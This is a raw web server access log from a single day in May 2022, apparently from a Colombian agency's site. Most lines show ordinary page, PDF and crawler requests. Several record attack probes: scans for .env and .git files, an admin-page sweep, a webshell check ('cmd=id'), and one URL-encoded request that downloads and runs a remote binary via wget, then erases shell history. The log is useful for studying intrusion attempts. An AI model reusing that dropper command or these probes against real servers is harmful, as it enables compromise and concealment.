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&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.98.94 - - [15/May/2022:11:47:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18aVqYGVhsCNkY3dxXEII11nppa8XbbRSUc6BPVaJlfiL6a2UKaEKj3pls7JNClX0f6+tDX/9zIqwXTn1XIOGWAAw1vkVMN3shkxjwtbHm4S3MmPrEIhXxLWCwpMS7E77IiWoq6ObMVzqBja21b0828kB3P5NKGA+U=&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.98.94 - - [15/May/2022:11:47:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19yG+TSI2T2D+FWAFlyzH8h481A1fJuFNvufp21ObCbOuZftLTwwFpkjHa3JdjPe71K1rpd/v6r0JXATvXO+H/58KlpAGAgmb/MwvISPtH2Qa/owZjxzZOGsFRpMHTH2ihYTwEqxDieT/PybmcRXNEhC2S5QP7XiDA=&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.98.94 - - [15/May/2022:11:47:06 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/XlBxNdr8FlvIyzrraNnz+D70f624QKtihhoDMhlHgZToHBFKXMGzx7M4QrEzdGrvtrm38labGPq8Iwa1btAivDUoGhVRNduWU4bqMdYHhnv1N+lG3r7kavDXmZHc/CCiiC0zDCXiU+7wPziOy/DeBHacBLtJ5oxs=&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.98.94 - - [15/May/2022:11:47:06 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19vSo2XZ9/AIRVIvvexx+/e7QTDKIhol8loYYXIPLZnK+nrHrp92B73os5a04BmY//X0rxrkmRpCbIKRKJp2Gnybud9WmgxRYz1mKOkgWAF5Hz/RkmhkUzslP1j0gWXxtTz3ONQZlegP4rb5dvw/3QBD36zF51bCyvVaSeqyMB2i10QNB1/aA//&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
216.245.221.92 - - [15/May/2022:11:47:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:46:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
109.237.103.123 - - [15/May/2022:11:49:03 -0500] "GET /.env HTTP/1.1" 404 1018
109.237.103.123 - - [15/May/2022:11:49:03 -0500] "\x16\x03\x01\x01D\x01" 400 226
172.22.2.4 - - [15/May/2022:11:47:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "POST /BLA/boletinlegal/functionRouter HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/menu.cfm HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/nmaplowercheck1652633332 HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/Jpk7 HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/Portal/Portal.mwsl HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "POST /BLA/boletinlegal/sdk HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/Portal0000.htm HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/HNAP1 HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/home.cfm HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/__Additional HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/pools/default/buckets HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/docs/cplugError.html/ HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:54 -0500] "GET /BLA/boletinlegal/CSS/Miniweb.css HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:54 -0500] "GET /BLA/boletinlegal/.git/HEAD HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:54 -0500] "GET /BLA/boletinlegal/index.html HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:54 -0500] "GET /BLA/boletinlegal/pools HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:55 -0500] "POST /BLA/boletinlegal/scripts/WPnBr.dll HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:55 -0500] "GET /BLA/boletinlegal/default.shtml HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:56 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:56 -0500] "GET /BLA/boletinlegal/localstart.jsp HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:57 -0500] "GET /BLA/boletinlegal/inicio.cfm HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:58 -0500] "GET /BLA/boletinlegal/admin.shtml HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:59 -0500] "GET /BLA/boletinlegal/admin.pl HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:51:59 -0500] "GET /BLA/boletinlegal/admin.html HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:52:00 -0500] "GET /BLA/boletinlegal/menu.jhtml HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:52:01 -0500] "GET /BLA/boletinlegal/menu.shtml HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:52:02 -0500] "GET /BLA/boletinlegal/admin.jsp HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:52:02 -0500] "GET /BLA/boletinlegal/tomcatwar.jsp HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:52:02 -0500] "GET /BLA/boletinlegal/default.cgi HTTP/1.1" 404 1043
172.22.2.4 - - [15/May/2022:11:52:02 -0500] "GET /BLA/boletinlegal/tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1" 404 1043
216.245.221.92 - - [15/May/2022:11:52:36 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.17 - - [15/May/2022:11:53:23 -0500] "GET /bogota-tendra-la-primera-planta-de-termovalorizacion-de-colombia-la-cual-convertira-los-residuos-en-energia-para-la-ciudad.html HTTP/1.1" 206 883
172.22.2.4 - - [15/May/2022:11:51:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 23992
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 23992
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 23235
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24378
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 23992
172.22.2.4 - - [15/May/2022:11:51:53 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [15/May/2022:11:52:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [15/May/2022:11:52:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [15/May/2022:11:52:01 -0500] "GET /BLA/boletinlegal/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 24378
172.22.2.4 - - [15/May/2022:11:52:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 23992
172.22.2.4 - - [15/May/2022:11:52:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:53:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57542
184.105.247.254 - - [15/May/2022:11:55:16 -0500] "GET / HTTP/1.1" 200 319
207.46.13.37 - - [15/May/2022:11:56:31 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/00642.doc HTTP/1.1" 200 193629
216.245.221.92 - - [15/May/2022:11:57:36 -0500] "HEAD / HTTP/1.1" 200 -
121.89.204.164 - - [15/May/2022:11:59:40 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [15/May/2022:11:58:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:59:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
173.252.83.1 - - [15/May/2022:12:01:13 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
186.154.24.21 - - [15/May/2022:12:02:36 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
216.245.221.92 - - [15/May/2022:12:02:36 -0500] "HEAD / HTTP/1.1" 200 -
186.154.24.21 - - [15/May/2022:12:02:45 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 629247
186.154.24.21 - - [15/May/2022:12:03:07 -0500] "GET /BLA/resoluciones/AUTOS%202011/3082.pdf HTTP/1.1" 200 2855591
186.154.24.21 - - [15/May/2022:12:03:07 -0500] "GET /BLA/resoluciones/AUTOS%202011/3082.pdf HTTP/1.1" 200 2855591
186.154.24.21 - - [15/May/2022:12:03:07 -0500] "GET /BLA/resoluciones/AUTOS%202011/3082.pdf HTTP/1.1" 206 1025
207.46.13.75 - - [15/May/2022:12:03:29 -0500] "GET /Publicaciones/2022EE83284.pdf HTTP/1.1" 404 227
207.46.13.109 - - [15/May/2022:12:04:07 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02151.doc HTTP/1.1" 200 657849
34.90.53.228 - - [15/May/2022:12:05:10 -0500] "GET / HTTP/1.1" 200 319
207.46.13.37 - - [15/May/2022:12:05:12 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/01150.doc HTTP/1.1" 200 345685
172.22.2.4 - - [15/May/2022:12:04:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:05:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [15/May/2022:12:07:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:10:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [15/May/2022:12:11:52 -0500] "-" 408 -
216.245.221.92 - - [15/May/2022:12:12:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:10:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
199.59.150.180 - - [15/May/2022:12:14:05 -0500] "-" 408 -
207.46.13.11 - - [15/May/2022:12:16:50 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/00064.doc HTTP/1.1" 200 208250
216.245.221.92 - - [15/May/2022:12:17:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:15:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:16:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57542
172.22.2.4 - - [15/May/2022:12:22:08 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [15/May/2022:12:22:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [15/May/2022:12:22:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [15/May/2022:12:22:08 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [15/May/2022:12:22:08 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [15/May/2022:12:22:08 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [15/May/2022:12:22:15 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [15/May/2022:12:22:15 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [15/May/2022:12:22:16 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [15/May/2022:12:22:16 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [15/May/2022:12:22:24 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [15/May/2022:12:22:27 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [15/May/2022:12:22:27 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [15/May/2022:12:22:27 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [15/May/2022:12:22:27 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [15/May/2022:12:22:27 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [15/May/2022:12:22:27 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [15/May/2022:12:22:27 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [15/May/2022:12:22:27 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [15/May/2022:12:22:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [15/May/2022:12:22:28 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [15/May/2022:12:22:28 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [15/May/2022:12:22:28 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [15/May/2022:12:22:28 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [15/May/2022:12:22:28 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [15/May/2022:12:22:29 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
186.154.24.21 - - [15/May/2022:12:22:31 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
216.245.221.92 - - [15/May/2022:12:22:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:22:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
186.154.24.21 - - [15/May/2022:12:23:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 629247
172.22.2.4 - - [15/May/2022:12:21:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/May/2022:12:22:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45179
186.154.24.21 - - [15/May/2022:12:23:36 -0500] "GET /BLA/resoluciones/AUTOS%202011/5885.pdf HTTP/1.1" 200 671034
186.154.24.21 - - [15/May/2022:12:23:36 -0500] "GET /BLA/resoluciones/AUTOS%202011/5885.pdf HTTP/1.1" 200 671034
186.154.24.21 - - [15/May/2022:12:23:36 -0500] "GET /BLA/resoluciones/AUTOS%202011/5885.pdf HTTP/1.1" 206 1025
207.46.13.37 - - [15/May/2022:12:23:44 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/01529.pdf HTTP/1.1" 200 376415
201.244.249.39 - - [15/May/2022:12:23:49 -0500] "GET /favicon.ico HTTP/1.1" 404 1420
207.46.13.64 - - [15/May/2022:12:23:58 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89797
207.46.13.159 - - [15/May/2022:12:24:03 -0500] "GET /bla/resoluciones/resoluciones%202022/0961.pdf HTTP/1.1" 200 5160961
172.22.2.4 - - [15/May/2022:12:22:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
201.245.192.253 - - [15/May/2022:12:23:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44078
186.154.24.21 - - [15/May/2022:12:24:31 -0500] "GET /BLA/resoluciones/AUTOS%202011/5885.pdf HTTP/1.1" 206 1
186.154.24.21 - - [15/May/2022:12:24:31 -0500] "GET /BLA/resoluciones/AUTOS%202011/5885.pdf HTTP/1.1" 206 662594
186.154.24.21 - - [15/May/2022:12:24:31 -0500] "GET /BLA/resoluciones/AUTOS%202011/5885.pdf HTTP/1.1" 200 671034
172.22.2.4 - - [15/May/2022:12:25:22 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%201%20del%2010%20de%20Abril%20de%202014.pdf HTTP/1.1" 304 -
173.252.107.118 - - [15/May/2022:12:26:48 -0500] "GET /si-te-gusta-la-pintura-el-dibujo-o-la-fotografia-el-concurso-a-vuelo-de-pajaro-es-para-ti.html HTTP/1.1" 206 861
216.245.221.92 - - [15/May/2022:12:27:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:27:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:28:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
172.22.2.4 - - [15/May/2022:12:30:16 -0500] "GET /BLA/boletinlegal/admin/config.php HTTP/1.1" 200 -
207.46.13.37 - - [15/May/2022:12:31:44 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/03170.pdf HTTP/1.1" 200 351711
216.245.221.92 - - [15/May/2022:12:32:36 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/May/2022:12:32:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45179
207.46.13.134 - - [15/May/2022:12:33:37 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/01085.doc HTTP/1.1" 200 340935
199.16.157.181 - - [15/May/2022:12:34:01 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
201.245.192.253 - - [15/May/2022:12:33:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44078
172.22.2.4 - - [15/May/2022:12:33:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:34:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
207.46.13.11 - - [15/May/2022:12:36:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/0729.pdf HTTP/1.1" 304 -
66.249.65.15 - - [15/May/2022:12:36:58 -0500] "-" 408 -
190.250.90.230 - - [15/May/2022:12:37:06 -0500] "GET /bogota-tendra-la-primera-planta-de-termovalorizacion-de-colombia-la-cual-convertira-los-residuos-en-energia-para-la-ciudad.html HTTP/1.1" 200 883
216.245.221.92 - - [15/May/2022:12:37:36 -0500] "HEAD / HTTP/1.1" 200 -
186.84.90.218 - - [15/May/2022:12:38:55 -0500] "GET /dia-mundial-de-las-aves-migratorias-cuidado-y-proteccion-para-la-biodiversidad.html HTTP/1.1" 200 1027
104.244.76.67 - - [15/May/2022:12:40:02 -0500] "GET /shell?cd%20%2Ftmp%20%7C%7C%20cd%20%2Frun%20%7C%7C%20cd%20%2F%3Bwget%20http%3A%2F%2F172.245.210.119%2F.19%20-O%20sarc%3B%20chmod%20777%20sarc%3B%20sh%20sarc%3Brm%20-rf%20sarc%3Bclear%3Bhistory%20-c%3B%20clear%3Bhistory%20-w HTTP/1.1" 404 1018
207.46.13.159 - - [15/May/2022:12:40:15 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02418.doc HTTP/1.1" 200 373828
172.22.2.4 - - [15/May/2022:12:39:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:40:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
216.245.221.92 - - [15/May/2022:12:42:36 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/May/2022:12:42:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45179
66.249.65.13 - - [15/May/2022:12:43:43 -0500] "-" 408 -
201.245.192.253 - - [15/May/2022:12:43:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44078
186.102.16.94 - - [15/May/2022:12:45:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+oL9uaXoR8/0fOHvyqVmSnw6XhXlWk58fJSFQ7EDcZAfR6+y9MmbpzFNsfP9WwtJd5mU4lum+TqhszFMb1Al0j6sIhMoqG3Jp9n8zLsOM6UzLGeP02YBpDkC68iXH/PLV0nG2SulCLMWYTgmw/Oi6wZMHj4dYjDVVGRYYeWsY6Fv0sPOVxuBQcfMjkDCywWPpfN7YpvJYpZWipF94VBQz6S5Bn02Qb9h4z0TJjM2rkd3RmUIgosZ74hj6j5an8YwI8itGhicf8GQ==&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
